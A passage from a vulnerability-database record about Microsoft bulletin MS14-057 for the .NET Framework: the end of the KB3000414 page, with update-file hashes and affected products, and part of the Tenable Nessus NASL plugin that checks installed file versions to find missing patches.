class=\"sbody-td\">777DFD33ABB9A9DCFC3192CA910C58061C32D5B1</td><td class=\"sbody-td\">FEA33AE2A36485EB3E54A92375EA6BD357A808C0A5C165CD5914DD9BC7461843</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP45-KB2972107-x64.exe</td><td class=\"sbody-td\">338BD55ED27B6897C6BCAA2A6EF9C57E77B95910</td><td class=\"sbody-td\">2327E0239CD26F22D71A697F9657333BB5B3503401C2B512308F6760AC670E01</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP45-KB2972107-x86.exe</td><td class=\"sbody-td\">1FF2E8E02ED7FF97457A85EADDEA125BEAED428C</td><td 
class=\"sbody-td\">E47EA29BE134E5A27F621A717C16F97628215F6963F49DE8954EC3B247CB6450</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP45-KB2979578-v2-x64.exe</td><td class=\"sbody-td\">8572841FC55CCF101C01F87EBFA4EC7BE0911EBF</td><td class=\"sbody-td\">539A78EBBDE633C12FBE59FFC6361B9A251FEAAB7A3A82864C963DA7DF7E5E49</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">NDP45-KB2979578-v2-x86.exe</td><td class=\"sbody-td\">ABD805B4503234EDF7A3D0EE32EE5BA1A72C6AC1</td><td class=\"sbody-td\">35CAAA796806D3631E11B62D742063CA7B1A41E9D4B73FDD9A0A802295DF8906</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2968292-ia64.msu</td><td class=\"sbody-td\">A9CFAD95B0D8BBE2C01541E09A916788A53087EB</td><td class=\"sbody-td\">68979E3BDBCB6C085FA2BB9B094C2B69ADE0CF152777E72C32DDF0AB22F4B3A7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2968292-x64.msu</td><td class=\"sbody-td\">CAA91DA06AC6928409E34821F9B46568068C0EF1</td><td class=\"sbody-td\">BC2354B15D9336F3CA6C82F813962DA96F22A1DCC5054668A7367625B3B5D1F8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2968292-x86.msu</td><td class=\"sbody-td\">B5352367B47FE33D868C40D58FE8C78BFA278B04</td><td class=\"sbody-td\">97A731C2776D7E21BEFF723486059020968A57085328FF133E2F77185763697E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2972098-ia64.msu</td><td class=\"sbody-td\">A837A86DBA74E550E62D59451AF4BED6BE5885DB</td><td class=\"sbody-td\">189A1A9A534911BCCF4D3C3C24EEDEFC8360D1C368AF7D49EC52AB914DB7F56C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2972098-x64.msu</td><td class=\"sbody-td\">4E4A09AA4EC90794698A04DEE27292CBB8F317D3</td><td class=\"sbody-td\">EFA450FB91DEE1856EC120ED251C633503C1C04AEDC21C4E700B085889269602</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2972098-x86.msu</td><td class=\"sbody-td\">CB46202234110F149232A535BDBAC67F0A7891C7</td><td 
class=\"sbody-td\">367E7D40208487ED8220F495B925DBE554075DC88FF809572020F1798E2226DB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2979568-ia64.msu</td><td class=\"sbody-td\">3D7409E38738911D59C72E65E21CFAFF24ED9630</td><td class=\"sbody-td\">BDEF311ED4E9613F3F4A68F59031321F4A5F50C556DC6FA1D808D7FDF6065D94</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2979568-x64.msu</td><td class=\"sbody-td\">F0C3DF10507C0EEBADC5F5CB722C093A3A46C5E7</td><td class=\"sbody-td\">B974C1585BB07D0756197631D4DCA372180AE1B17FD36F717ADDD1486BB2A43D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.0-KB2979568-x86.msu</td><td class=\"sbody-td\">984EEDD830AAE372AC0578973BEEF80BC5EA08F2</td><td class=\"sbody-td\">A606F49318A2171A729AC14663E4C12262E47F0FD7361D74E6C0AB1D9DE728E0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2968294-ia64.msu</td><td class=\"sbody-td\">43BC4F31CFC8C133D625BB83567B8BE0064030DA</td><td class=\"sbody-td\">ACA6B01C2ED8AC2AB72E7E24949B186C2C9DA7C29BC36EF8BB49F1290FB7FA8B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2968294-x64.msu</td><td class=\"sbody-td\">CFF0BAFAC3C677448C233DC0B596C8A14B9FF58C</td><td class=\"sbody-td\">42F7C07A483A7940F8C0FF61F8F16D0839E567B9848BA67EAED2A20064FC11AD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2968294-x86.msu</td><td class=\"sbody-td\">5D007341C62969877271E7AA20607281BC8C338B</td><td class=\"sbody-td\">764766E0732A29B718B5F49949C91506494A8D2EDBEF995770C089E6825277EA</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2972100-ia64.msu</td><td class=\"sbody-td\">5E463F7DF88201A29F470063A0512DF2B92A9755</td><td class=\"sbody-td\">90C85E6E9B5858C843C9D1384AE8F1718BFE759738FC6C670A6B54E16761D930</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2972100-x64.msu</td><td class=\"sbody-td\">BA7FB9E64BCA3E59AC2310652357065817B3355B</td><td 
class=\"sbody-td\">0B267ED605A410A328B2EDE3D4F28C4EF781F6F225B5A2F8C0C4F21E87AC046A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2972100-x86.msu</td><td class=\"sbody-td\">2ED06D2B5D61481A10C30622EE9B3065F23AECC7</td><td class=\"sbody-td\">A12D47161C2BC803111D320D37246B069E06FC0823BD97D9DCA3B621D9F009AE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2979570-ia64.msu</td><td class=\"sbody-td\">4584844DAFF8896D9647032CAD2C2C8E43B13DB7</td><td class=\"sbody-td\">728853A40FB3EFAA24090F8946B718C36A958E87CFDC9D3FCA067B84B712216A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2979570-x64.msu</td><td class=\"sbody-td\">646D2E4C8D3649BAB3A7D19AD436ECF22F4021E4</td><td class=\"sbody-td\">82986C6100C5D27CC9CF48F7305C0D99F78FB6ACACA6165198551EF0D6556E67</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows6.1-KB2979570-x86.msu</td><td class=\"sbody-td\">F1763AC37FB72D8DA11C6162EE7EA71C0F92DA96</td><td class=\"sbody-td\">2F319B052C45291843A8F0AFA7B087D3D4729A232B7AB1CF3DA43937CCD1070B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2968295-x64.msu</td><td class=\"sbody-td\">9E54756A93C909DE40FCA51F88D5C0EBDC9EF2B8</td><td class=\"sbody-td\">800351B96E0830FD13BE82378C4A96F432318493E8AC524DEB1335115D986323</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2968295-x86.msu</td><td class=\"sbody-td\">5C159A12B314A2EC3D448D572BAC118B6FBED3BC</td><td class=\"sbody-td\">46FE382621C0554241CC52A8EB339C92CCA5478A611EDD1F71AC9FAFBE032A8B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2972101-x64.msu</td><td class=\"sbody-td\">5C312B8A8CC10509E7693DD0FB4185461D74D6F1</td><td class=\"sbody-td\">55FA3CAFE95A11F3C40865AE7D1ACD08035DD544D1253628B26C71C9E0B14A15</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2972101-x86.msu</td><td class=\"sbody-td\">CDFC9D5340B6733A9E84C1745BDADD011FBDEB18</td><td 
class=\"sbody-td\">67E4C349C49EFE2E750A02FB603309A745BEC9CB0DDA4A2083EBEC5639598EF3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2978042-x64.msu</td><td class=\"sbody-td\">4B4671DBAE1C60DAA6D8B9CDB40A4279BF31EA93</td><td class=\"sbody-td\">3713DFF1D1906B5C1EA14665C37D0313B8FA0B9039FCE128B0153ABFB5BBC04B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2978042-x86.msu</td><td class=\"sbody-td\">F6ABC2CA0B16D91AB8167EE2A2C17E9EB3C574FD</td><td class=\"sbody-td\">71E0BC0D3D3BBA05ABB066A956A5A5D3905E70C505B9BBF7079865DD5D34D0C9</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2979571-x64.msu</td><td class=\"sbody-td\">65A41D244FDC424654E00E1D8EB9C9B25729F902</td><td class=\"sbody-td\">DB95460031DA85545DFB5CC7E9099039223B6D5D662AA6532D8BD5CBD7CF6536</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2979571-x86.msu</td><td class=\"sbody-td\">4E5EDD3FA24B207A821C674D78DA858F1F363A3E</td><td class=\"sbody-td\">ABFB9F76FAAC720F4258D39212D3241D034224E19A3A706596E493B5BD2D54D6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2979577-x64.msu</td><td class=\"sbody-td\">9029B740D449AC74DE98B186DA51C09E3BC8DE41</td><td class=\"sbody-td\">90EEFFF2004C0CF4CD47088316A3E0B69E7239E7B6FDAEF3B6B2ED7BAF203326</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8-RT-KB2979577-x86.msu</td><td class=\"sbody-td\">7136743342F647D3D16B6C9715AF1E07058870C2</td><td class=\"sbody-td\">DC0297B8C66EA34ED3D3261D970EE7C1C4D0F75074EC99B763479FD57A907F78</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2968296-x64.msu</td><td class=\"sbody-td\">A5D0DE083618322CD696C91D30A01C0FF060AF0F</td><td class=\"sbody-td\">869C533AF42E14EC2D5B2BFC8A076AEA8A3958A4ABA92D02BB79DBCF02102B1B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2968296-x86.msu</td><td class=\"sbody-td\">D96BE3355E90A63A43E6D5A91F3E21AC879A7699</td><td 
class=\"sbody-td\">B2AB8F69247C0C5512FF33667FD4AE6F8606D8181A5E1982D36FF4DC1F2A6AB6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2972103-v2-x64.msu</td><td class=\"sbody-td\">539F9C91D2CFDF2D046DBD96CD6EFE2748702EE0</td><td class=\"sbody-td\">79869AF484F7A0B2B2EDD5D9DE9DB209621032A6C045D2C9C46CB7199868036D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2972103-v2-x86.msu</td><td class=\"sbody-td\">A07E9097F4BB1664DCD6B45112F97933208EFD77</td><td class=\"sbody-td\">352C3EE9FF72986C92809531E93870884A7FC0E78713162D579C06329AB19FBF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2978041-x64.msu</td><td class=\"sbody-td\">93D7DD68C7487670C0AB4D5EB154A0EF5E40A306</td><td class=\"sbody-td\">E8E85B3F3D0AC53436D12D3783CE680C6CEE288642964C5842A650156EE5FB43</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2978041-x86.msu</td><td class=\"sbody-td\">80ADD0097BB5940209E825E6948A0935791F2F69</td><td class=\"sbody-td\">20D4349FB5EB2948A65365241CCC4B6D7C041CB57A1515616DE96B2E17C2AB37</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2979573-x64.msu</td><td class=\"sbody-td\">4E6B3A60155951F82426AACD24D2076875DDE8F7</td><td class=\"sbody-td\">43917781745BEC2D904C02A9BD522FBA1CCE6A6B83842EF561F6EBBC8B605750</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2979573-x86.msu</td><td class=\"sbody-td\">48E21177A582CA8F94DB6819D1DCA8A9FFB2AA0B</td><td class=\"sbody-td\">9B1BDB0A281E623BABC8BD9C5C766F5EFCE7ADDFF937F72CDB6E264CDF6FBBA8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2979576-x64.msu</td><td class=\"sbody-td\">41A253554010BE99A3CA3A01BAC864D534645253</td><td class=\"sbody-td\">87F60311C67BA282436F9F058177B25722577A2F8693E9FEA3311697DB63A30E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Windows8.1-KB2979576-x86.msu</td><td class=\"sbody-td\">322E42AEBB7E4E65BA934D4495C4F9B8A2EE80CD</td><td 
class=\"sbody-td\">BD33B42826DC144F2C6368D7021DD2AD2C60EF38EE1015C0B532EFF13AE433DE</td></tr></table></div></div><br/></span></div></div></div></div><h2></h2><div class=\"kb-moreinformation-section section\"><a class=\"bookmark\" id=\"appliestoproducts\"></a><br/><h3 class=\"sbody-h3\">Applies to</h3>This article applies to the following:<ul class=\"sbody-free_list\"><li>Microsoft .NET Framework 4.5.2 when used with:<ul class=\"sbody-free_list\"><li>Windows 8.1</li><li>Windows RT 8.1</li><li>Windows Server 2012 R2</li><li>Windows 8</li><li>Windows RT</li><li>Windows Server 2012</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li></ul></li><li>Microsoft .NET Framework 4.5.1 when used with:<ul class=\"sbody-free_list\"><li>Windows 8.1</li><li>Windows RT 8.1</li><li>Windows Server 2012 R2</li><li>Windows 8</li><li>Windows RT</li><li>Windows Server 2012</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li></ul></li><li>Microsoft .NET Framework 4.5 when used with:<ul class=\"sbody-free_list\"><li>Windows 8.1</li><li>Windows RT 8.1</li><li>Windows Server 2012 R2</li><li>Windows 8</li><li>Windows RT</li><li>Windows Server 2012</li><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li></ul></li><li>Microsoft .NET Framework 4 when used with:<ul class=\"sbody-free_list\"><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2 Service Pack 1</li><li>Windows Server 2008 Service Pack 2</li><li>Windows Server 2003 Service Pack 2</li></ul></li><li>Microsoft .NET Framework 3.5.1 when used with:<ul class=\"sbody-free_list\"><li>Windows 7 Service Pack 1</li><li>Windows Server 2008 R2 Service Pack 1</li></ul></li><li>Microsoft .NET Framework 3.5 when used 
with:<ul class=\"sbody-free_list\"><li>Windows 8.1</li><li>Windows Server 2012 R2</li><li>Windows 8</li><li>Windows Server 2012</li></ul></li><li>Microsoft .NET Framework 2.0 Service Pack 2 when used with:<ul class=\"sbody-free_list\"><li>Windows Vista Service Pack 2</li><li>Windows Server 2008 Service Pack 2</li><li>Windows Server 2003 Service Pack 2</li></ul></li></ul></div></body></html>", "edition": 2, "modified": "2014-10-14T17:33:10", "id": "KB3000414", "href": "https://support.microsoft.com/en-us/help/3000414/", "published": "2014-10-14T00:00:00", "title": "MS14-057: Vulnerabilities in the .NET Framework could allow remote code execution: October 14, 2014", "type": "mskb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:43:40", "description": "The remote Windows host has a version of the Microsoft .NET Framework\nthat is affected by a vulnerability that allows a remote attacker to\nexecute code remotely.", "edition": 25, "published": "2014-10-15T00:00:00", "title": "MS14-057: Vulnerabilities in .NET Framework Could Allow Remote Code Execution (3000414)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4073", "CVE-2014-4122", "CVE-2014-4121"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:.net_framework"], "id": "SMB_NT_MS14-057.NASL", "href": "https://www.tenable.com/plugins/nessus/78432", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78432);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2014-4073\", \"CVE-2014-4121\", \"CVE-2014-4122\");\n script_bugtraq_id(70312, 70313, 70351);\n script_xref(name:\"MSFT\", value:\"MS14-057\");\n script_xref(name:\"MSKB\", value:\"2968292\");\n script_xref(name:\"MSKB\", value:\"2968294\");\n script_xref(name:\"MSKB\", value:\"2968295\");\n script_xref(name:\"MSKB\", value:\"2968296\");\n 
script_xref(name:\"MSKB\", value:\"2972098\");\n script_xref(name:\"MSKB\", value:\"2972100\");\n script_xref(name:\"MSKB\", value:\"2972101\");\n script_xref(name:\"MSKB\", value:\"2972103\");\n script_xref(name:\"MSKB\", value:\"2972105\");\n script_xref(name:\"MSKB\", value:\"2972106\");\n script_xref(name:\"MSKB\", value:\"2972107\");\n script_xref(name:\"MSKB\", value:\"2978041\");\n script_xref(name:\"MSKB\", value:\"2978042\");\n script_xref(name:\"MSKB\", value:\"2979568\");\n script_xref(name:\"MSKB\", value:\"2979570\");\n script_xref(name:\"MSKB\", value:\"2979571\");\n script_xref(name:\"MSKB\", value:\"2979573\");\n script_xref(name:\"MSKB\", value:\"2979574\");\n script_xref(name:\"MSKB\", value:\"2979575\");\n script_xref(name:\"MSKB\", value:\"2979576\");\n script_xref(name:\"MSKB\", value:\"2979577\");\n script_xref(name:\"MSKB\", value:\"2979578\");\n\n script_name(english:\"MS14-057: Vulnerabilities in .NET Framework Could Allow Remote Code Execution (3000414)\");\n script_summary(english:\"Checks the version of the .NET files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of the .NET Framework installed on the remote host is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host has a version of the Microsoft .NET Framework\nthat is affected by a vulnerability that allows a remote attacker to\nto execute code remotely.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-057\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for .NET Framework 2.0 SP2,\n3.5, 3.5.1, 4.0, 4.5, 4.5.1, and 4.5.2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits 
are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:.net_framework\");\n\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"microsoft_net_framework_installed.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\n# Windows Embedded is not supported by Nessus\n# There are cases where this plugin is flagging embedded\n# hosts improperly since this update does not apply\n# to those machines\nproductname = get_kb_item(\"SMB/ProductName\");\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS14-057';\nkbs = make_list(\n \"2968292\",\n \"2968294\",\n \"2968295\",\n \"2968296\",\n \"2972098\",\n \"2972100\",\n \"2972101\",\n \"2972103\",\n \"2972105\",\n \"2972106\",\n \"2972107\",\n \"2978041\",\n \"2978042\",\n \"2979568\",\n \"2979570\",\n \"2979571\",\n \"2979573\",\n \"2979574\",\n \"2979575\",\n \"2979576\",\n 
\"2979577\",\n \"2979578\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win2003:'2', vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n# Determine if .NET 4.5, 4.5.1, or 4.5.2 is installed\ndotnet_452_installed = FALSE;\ndotnet_451_installed = FALSE;\ndotnet_45_installed = FALSE;\n\ncount = get_install_count(app_name:'Microsoft .NET Framework');\nif (count > 0)\n{\n installs = get_installs(app_name:'Microsoft .NET Framework');\n foreach install(installs[1])\n {\n ver = install[\"version\"];\n if (ver == \"4.5\") dotnet_45_installed = TRUE;\n if (ver == \"4.5.1\") dotnet_451_installed = TRUE;\n if (ver == \"4.5.2\") dotnet_452_installed = TRUE;\n }\n}\nvuln = 0;\n\n########## KB2968292 #############\n# .NET Framework 2.0 SP2 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n##################################\nmissing = 0;\n# LDR / GDR are the same\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mscories.dll\", version:\"2.0.50727.4252\", min_version:\"2.0.50727.3000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2968292\");\nvuln += missing;\n\n########### KB2968294 ############\n# .NET Framework 3.5.1 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n##################################\nmissing = 0;\n# LDR / GDR are the same\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mscories.dll\", version:\"2.0.50727.5483\", min_version:\"2.0.50727.4000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2968294\");\nvuln += 
missing;\n\n########### KB2968295 ############\n# .NET Framework 3.5 #\n# Windows 8 #\n# Windows Server 2012 #\n##################################\nmissing = 0;\n# LDR / GDR are the same\nmissing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mscorie.dll\", version:\"2.0.50727.6419\", min_version:\"2.0.50727.5000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2968295\");\nvuln += missing;\n\n\n########### KB2968296 ############\n# .NET Framework 3.5 #\n# Windows 8.1 #\n# Windows Server 2012 R2 #\n##################################\nmissing = 0;\n# LDR / GDR are the same\nmissing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mscorie.dll\", version:\"2.0.50727.8008\", min_version:\"2.0.50727.5000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2968296\");\nvuln += missing;\n\n\n########## KB2972098 #############\n# .NET Framework 2.0 SP2 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"system.dll\", version:\"2.0.50727.4253\", min_version:\"2.0.50727.2000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"system.dll\", version:\"2.0.50727.7071\", min_version:\"2.0.50727.5000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972098\");\nvuln += missing;\n\n########### KB2972100 ############\n# .NET Framework 3.5.1 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"system.dll\", version:\"2.0.50727.5485\", min_version:\"2.0.50727.3000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"system.dll\", 
version:\"2.0.50727.7071\", min_version:\"2.0.50727.6000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972100\");\nvuln += missing;\n\n\n########## KB2972101 ###########\n# .NET Framework 3.5 #\n# Windows 8 #\n# Windows Server 2012 #\n################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"system.dll\", version:\"2.0.50727.6421\", min_version:\"2.0.50727.4000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"system.dll\", version:\"2.0.50727.7071\", min_version:\"2.0.50727.6500\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972101\");\nvuln += missing;\n\n########## KB2972103 ###########\n# .NET Framework 3.5 #\n# Windows 8.1 #\n# Windows Server 2012 R2 #\n################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.dll\", version:\"2.0.50727.8009\", min_version:\"2.0.50727.6000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"system.dll\", version:\"2.0.50727.8615\", min_version:\"2.0.50727.8100\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972103\");\nvuln += missing;\n\n\n########### KB2972105 ############\n# .NET Framework 2.0 SP2 #\n# Windows Server 2003 SP2 #\n##################################\nmissing = 0;\n# GDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.dll\", version:\"2.0.50727.3662\", min_version:\"2.0.50727.3000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.dll\", version:\"2.0.50727.8637\", min_version:\"2.0.50727.8000\", dir:\"\\Microsoft.NET\\Framework\\v2.0.50727\");\n\nif (missing > 0) 
hotfix_add_report(bulletin:bulletin, kb:\"2972105\");\nvuln += missing;\n\n\n########### KB2972106 ############\n# .NET Framework 4 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n# Windows Server 2003 SP2 #\n##################################\nmissing = 0;\n\n# Windows Server 2003 SP2\n# GDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.dll\", version:\"4.0.30319.1026\", min_version:\"4.0.30319.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"System.dll\", version:\"4.0.30319.2045\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\n# Windows Vista/Server 2008 SP2\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.dll\", version:\"4.0.30319.1026\", min_version:\"4.0.30319.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"System.dll\", version:\"4.0.30319.2045\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\n# Windows 7/Server 2008 R2 SP1\n# GDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.dll\", version:\"4.0.30319.1026\", min_version:\"4.0.30319.0\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n# LDR\nmissing += hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"System.dll\", version:\"4.0.30319.2045\", min_version:\"4.0.30319.1500\", dir:\"\\Microsoft.NET\\Framework\\v4.0.30319\");\n\nif (missing > 0) hotfix_add_report(bulletin:bulletin, kb:\"2972106\");\nvuln += missing;\n\n########### KB2972107 ############\n# .NET Framework 4.5/4.5.1/4.5.2 #\n# Windows Vista SP2 #\n# Windows Server 2008 SP2 #\n# Windows 7 SP1 #\n# Windows Server 2008 R2 SP1 #\n##################################\nmissing = 0;\nif (dotnet_45_installed || dotnet_451_installed || dotnet_452_installed)\n{\n # Windows Vista/Server 2008 SP2\n # GDR\n missing += 
